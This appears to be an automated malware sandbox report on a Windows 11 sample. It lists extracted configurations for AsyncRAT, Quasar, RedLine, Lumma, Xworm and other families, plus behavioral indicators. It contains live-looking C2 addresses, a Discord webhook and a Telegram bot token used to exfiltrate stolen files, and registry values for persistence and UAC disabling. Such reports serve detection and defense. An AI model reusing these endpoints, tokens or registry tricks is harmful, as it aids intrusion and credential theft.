asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
658s
max time network
658s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26-11-2024 18:49

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

newwwwwwwwwwwwwwwwww

185.16.38.41:2033

185.16.38.41:2034

185.16.38.41:2035

185.16.38.41:2022

185.16.38.41:2023

185.16.38.41:2024

185.16.38.41:20000

185.16.38.41:6666

Mutex

AsyncMutex_XXXX765643

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

sound-vietnam.gl.at.ply.gg:52575

Attributes

Install_directory
%LocalAppData%
install_file
Terraria-Multiplayer-Fix-Online.exe

Extracted

Family

redline

Botnet

185.215.113.25:13686

Extracted

Family

lumma

https://powerful-avoids.sbs

https://motion-treesz.sbs

https://disobey-curly.sbs

https://leg-sate-boat.sbs

https://story-tense-faz.sbs

https://blade-govern.sbs

https://occupy-blushi.sbs

https://frogs-severz.sbs

https://property-imper.sbs

Extracted

Family

quasar

Version

1.4.1

Botnet

sigorta

18.198.25.148:1604

Mutex

af7e773d-541a-46fd-87d3-06bb0a26aab9

Attributes

encryption_key
D306945220105109C86E6E257D749CE885E76091
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

metasploit_stager

144.34.162.13:3333

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

85.198.108.36:7667

Mutex

egghlcckqridunl

Attributes

delay
6
install
false
install_folder
%Temp%

aes.plain

Extracted

Family

redline

Botnet

LiveTraffic

95.179.250.45:26212

Extracted

Family

redline

Botnet

TG@CVV88888

185.218.125.157:21441

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

redline

185.215.113.67:21405

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1293231846204903474/NlFoQQli1eEBiZ1mTgA4lGWcgDGUPQu-TH2KjA0djnkLkN-1Rj1Y4K7wda0xn3Aw-GJk

Extracted

Family

phemedrone

https://api.telegram.org/bot7414426785:AAGjcWvGORe1_ToCk6Lpu9MSjNamkIOlrLs/sendDocument

Extracted

Family

quasar

Version

1.4.1

Botnet

CleanerV2

192.168.4.185:4782

Mutex

1607a026-352e-4041-bc1f-757dd6cd2e95

Attributes

encryption_key
73BCD6A075C4505333DE1EDC77C7242196AF9552
install_name
Client.exe
log_directory
Clean
reconnect_delay
3000
startup_key
CleanerV2
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7414426785:AAGjcWvGORe1_ToCk6Lpu9MSjNamkIOlrLs/sendDocumen

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
BabbleLoader
BabbleLoader is a malware loader written in C++.
loader babbleloader
Babbleloader family
babbleloader

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5356-3740-0x0000000000B60000-0x0000000000B78000-memory.dmp	family_xworm
behavioral1/files/0x000400000002a488-3735.dat	family_xworm

Detects BabbleLoader Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x001900000002ab68-921.dat	family_babbleloader

Detects ZharkBot payload 1 IoCs

ZharkBot is a botnet written C++.

Processes:

resource	yara_rule
behavioral1/files/0x001c00000002ac90-5345.dat	zharkcore

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

NoEscape.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\winnt32.exe"	NoEscape.exe

Njrat family
njrat
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x001a00000002ab6c-2811.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x001f00000002ab74-3871.dat	family_quasar
behavioral1/memory/1556-3876-0x0000000000680000-0x00000000009A4000-memory.dmp	family_quasar
behavioral1/files/0x001c00000002ac89-5325.dat	family_quasar
behavioral1/memory/3780-5330-0x0000000000F30000-0x0000000001254000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2352-3812-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/5488-4057-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1840-4327-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/files/0x001a00000002ac1d-4491.dat	family_redline
behavioral1/memory/5300-4496-0x0000000000080000-0x00000000000D2000-memory.dmp	family_redline

Redline family
redline
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Suspicious use of NtCreateUserProcessOtherParentProcess 20 IoCs

Processes:

HVNC1.exe2026511412.exewinupsecvmgr.exePlates.pifnxmr.exewinupsecvmgr.exeSkySync.scrCultures.pif

description	pid	Process	procid_target
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 3580 created 3296	3580	HVNC1.exe	52
PID 4188 created 3296	4188	2026511412.exe	52
PID 4188 created 3296	4188	2026511412.exe	52
PID 1336 created 3296	1336	winupsecvmgr.exe	52
PID 1336 created 3296	1336	winupsecvmgr.exe	52
PID 1336 created 3296	1336	winupsecvmgr.exe	52
PID 1488 created 3296	1488	Plates.pif	52
PID 1488 created 3296	1488	Plates.pif	52
PID 1728 created 3296	1728	nxmr.exe	52
PID 1728 created 3296	1728	nxmr.exe	52
PID 892 created 3296	892	winupsecvmgr.exe	52
PID 5160 created 3296	5160	SkySync.scr	52
PID 5244 created 3296	5244	Cultures.pif	52

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

NoEscape.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NoEscape.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot
Zharkbot family
zharkbot
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x0006000000000689-3684.dat	family_asyncrat
behavioral1/files/0x001d00000002ac05-4442.dat	family_asyncrat
behavioral1/files/0x001e00000002ac96-5361.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exeClient_protected.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Client_protected.exe

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

file.exeremcos.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	remcos.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
5904	powershell.exe
2772	powershell.exe
4452	powershell.exe
3744	powershell.exe
5152	powershell.exe
5740	powershell.exe
1872	powershell.exe
5856	powershell.exe
6104	powershell.exe
6136	powershell.exe
696	powershell.exe
700	powershell.exe
4752	powershell.exe
3360	powershell.exe
3744	powershell.exe
5632	powershell.exe
6004	powershell.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

NoEscape.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	NoEscape.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeattrib.exefiler.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	filer.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
6120	netsh.exe
3400	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

random.exeClient_protected.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Client_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Client_protected.exe

Drops startup file 4 IoCs

Processes:

cmd.exeXClient.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk	XClient.exe

Executes dropped EXE 64 IoCs

Processes:

winbox.exefoggy-mountains.exeworker.exeworker.exemajor.exeHVNC1.exekp8dnpa9.exem.exesysnldcvmr.exekp8dnpa9.exe1690630277.exe3376418481.exe2026511412.exe1078713571.exewinupsecvmgr.exe167292389.exe3388728634.exe0b44ippu.exePlates.pifnxmr.exegagagggagagag.exewinupsecvmgr.exet1.exeXClient.exeevetbeta.exeTerraria-Multiplayer-Fix-Online.exeGIFT-INFO.lMG.exeGIFT-INFO.lMG.exerandom.exepostbox.exeaa.exeTerraria-Multiplayer-Fix-Online.exeLummaC2.exezzzz1.exeServer.exeserver.exeTerraria-Multiplayer-Fix-Online.exe1_encoded.exeClient_protected.exettl.exettl.exenc64.exeGOLD.exec3.exe5gevcp8z.exe5gevcp8z.tmp5gevcp8z.exe5gevcp8z.tmpfiler.exeGxtuum.exeTerraria-Multiplayer-Fix-Online.exeSkySync.scrWinRarInstall.exewinrar-info.exenjrat.exewinrar-x64-701ru.exejb4w5s2l.exejb4w5s2l.exeExtremeInjector.exesurfex.exerundll32.exenewfile.exefile.exeremcos.exe

pid	Process
5660	winbox.exe
5932	foggy-mountains.exe
3332	worker.exe
1396	worker.exe
3572	major.exe
3580	HVNC1.exe
5148	kp8dnpa9.exe
1964	m.exe
5980	sysnldcvmr.exe
3744	kp8dnpa9.exe
1088	1690630277.exe
5044	3376418481.exe
4188	2026511412.exe
340	1078713571.exe
1336	winupsecvmgr.exe
3700	167292389.exe
4820	3388728634.exe
4584	0b44ippu.exe
1488	Plates.pif
1728	nxmr.exe
4428	gagagggagagag.exe
892	winupsecvmgr.exe
2928	t1.exe
5356	XClient.exe
4392	evetbeta.exe
3736	Terraria-Multiplayer-Fix-Online.exe
3692	GIFT-INFO.lMG.exe
2352	GIFT-INFO.lMG.exe
4112	random.exe
5432	postbox.exe
1556	aa.exe
5152	Terraria-Multiplayer-Fix-Online.exe
1072	LummaC2.exe
5272	zzzz1.exe
2528	Server.exe
2644	server.exe
5692	Terraria-Multiplayer-Fix-Online.exe
3560	1_encoded.exe
6032	Client_protected.exe
2620	ttl.exe
3160	ttl.exe
1996	nc64.exe
1536	GOLD.exe
1764	c3.exe
2516	5gevcp8z.exe
5896	5gevcp8z.tmp
3348	5gevcp8z.exe
3412	5gevcp8z.tmp
3840	filer.exe
5908	Gxtuum.exe
5388	Terraria-Multiplayer-Fix-Online.exe
5160	SkySync.scr
4916	WinRarInstall.exe
6032	winrar-info.exe
3136	njrat.exe
404	winrar-x64-701ru.exe
908	jb4w5s2l.exe
2288	jb4w5s2l.exe
3696	ExtremeInjector.exe
3128	surfex.exe
124	rundll32.exe
4016	newfile.exe
4004	file.exe
2244	remcos.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine	random.exe

Loads dropped DLL 64 IoCs

Processes:

foggy-mountains.exeworker.exe

pid	Process
5932	foggy-mountains.exe
5932	foggy-mountains.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe
1396	worker.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x001d00000002ab73-3961.dat	themida
behavioral1/memory/6032-3971-0x0000000000530000-0x0000000000BBE000-memory.dmp	themida
behavioral1/memory/6032-3972-0x0000000000530000-0x0000000000BBE000-memory.dmp	themida
behavioral1/memory/6032-3976-0x0000000000530000-0x0000000000BBE000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	141.98.234.31

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

server.exerundll32.exenewfile.exefile.exeremcos.exeskuld3.exem.exeXClient.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .."	rundll32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .."	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Windows Telemetry Crash Uploader = "C:\\ProgramData\\Telemetry.exe"	newfile.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	skuld3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	m.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Terraria-Multiplayer-Fix-Online = "C:\\Users\\Admin\\AppData\\Local\\Terraria-Multiplayer-Fix-Online.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Client_protected.exeNoEscape.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Client_protected.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NoEscape.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

svchost.exeNoEscape.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	NoEscape.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	NoEscape.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

Processes:

flow	ioc
118	raw.githubusercontent.com
122	raw.githubusercontent.com
267	raw.githubusercontent.com
298	raw.githubusercontent.com
511	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	api.ipify.org
8	api.ipify.org
267	ip-api.com
615	ip-api.com

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

NoEscape.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon = "0"	NoEscape.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1"	NoEscape.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0"	NoEscape.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

GameBarPresenceWriter.exe

pid	Process
3104	GameBarPresenceWriter.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

rundll32.exe

description	ioc	Process
File created	C:\autorun.inf	rundll32.exe
File opened for modification	C:\autorun.inf	rundll32.exe
File created	D:\autorun.inf	rundll32.exe
File created	F:\autorun.inf	rundll32.exe
File opened for modification	F:\autorun.inf	rundll32.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
2928	tasklist.exe
5936	tasklist.exe
4032	tasklist.exe
1920	tasklist.exe
2096	tasklist.exe
5176	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

NoEscape.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\noescape.png"	NoEscape.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

random.exeClient_protected.exe

pid	Process
4112	random.exe
6032	Client_protected.exe

Suspicious use of SetThreadContext 16 IoCs

Processes:

HVNC1.exekp8dnpa9.exewinupsecvmgr.exeGIFT-INFO.lMG.exepostbox.exezzzz1.exeGOLD.exejb4w5s2l.exeExtremeInjector.exesurfex.exeremcos.exeCultures.pifControlledAccessPoint.exe300.exeImposed.com

description	pid	Process	procid_target
PID 3580 set thread context of 4852	3580	HVNC1.exe	115
PID 5148 set thread context of 3744	5148	kp8dnpa9.exe	119
PID 1336 set thread context of 6072	1336	winupsecvmgr.exe	140
PID 1336 set thread context of 492	1336	winupsecvmgr.exe	141
PID 3692 set thread context of 2352	3692	GIFT-INFO.lMG.exe	189
PID 5432 set thread context of 5704	5432	postbox.exe	200
PID 5272 set thread context of 3736	5272	zzzz1.exe	205
PID 1536 set thread context of 5488	1536	GOLD.exe	225
PID 908 set thread context of 2288	908	jb4w5s2l.exe	290
PID 3696 set thread context of 3876	3696	ExtremeInjector.exe	295
PID 3128 set thread context of 1840	3128	surfex.exe	300
PID 2244 set thread context of 1856	2244	remcos.exe	318
PID 5244 set thread context of 1504	5244	Cultures.pif	365
PID 6104 set thread context of 592	6104	ControlledAccessPoint.exe	370
PID 2052 set thread context of 5752	2052	300.exe	461
PID 5268 set thread context of 2320	5268	Imposed.com	512

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x001b00000002ab57-8.dat	upx
behavioral1/memory/5660-11-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral1/memory/5660-36-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral1/files/0x001d00000002ac1e-4529.dat	upx
behavioral1/memory/568-4531-0x0000000000960000-0x00000000013A8000-memory.dmp	upx
behavioral1/memory/568-4533-0x0000000000960000-0x00000000013A8000-memory.dmp	upx
behavioral1/files/0x002000000002ab78-4813.dat	upx
behavioral1/memory/1072-4818-0x0000000000400000-0x000000000051A000-memory.dmp	upx
behavioral1/memory/1072-5275-0x0000000000400000-0x000000000051A000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

foggy-mountains.exe

description	ioc	Process
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.htm	foggy-mountains.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.jpg	foggy-mountains.exe

Drops file in Windows directory 13 IoCs

Processes:

m.exe0b44ippu.exerundll32.exeOffnewhere.exeNoEscape.exenjrat.exeGuidanceConnectors.exe

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	m.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	m.exe
File opened for modification	C:\Windows\SanyoToday	0b44ippu.exe
File opened for modification	C:\Windows\BookmarkRolling	0b44ippu.exe
File opened for modification	C:\Windows\rundll32.exe	rundll32.exe
File created	C:\Windows\Tasks\Gxtuum.job	Offnewhere.exe
File created	C:\Windows\winnt32.exe	NoEscape.exe
File opened for modification	C:\Windows\winnt32.exe	NoEscape.exe
File opened for modification	C:\Windows\DeletedWilliam	0b44ippu.exe
File opened for modification	C:\Windows\HimselfConsumption	0b44ippu.exe
File created	C:\Windows\rundll32.exe	njrat.exe
File opened for modification	C:\Windows\rundll32.exe	njrat.exe
File opened for modification	C:\Windows\HeroesMistakes	GuidanceConnectors.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral1/files/0x001c00000002ab62-43.dat	pyinstaller
behavioral1/files/0x001e00000002ab82-3981.dat	pyinstaller

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

Processes:

resource	yara_rule
behavioral1/files/0x001a00000002ac37-4590.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
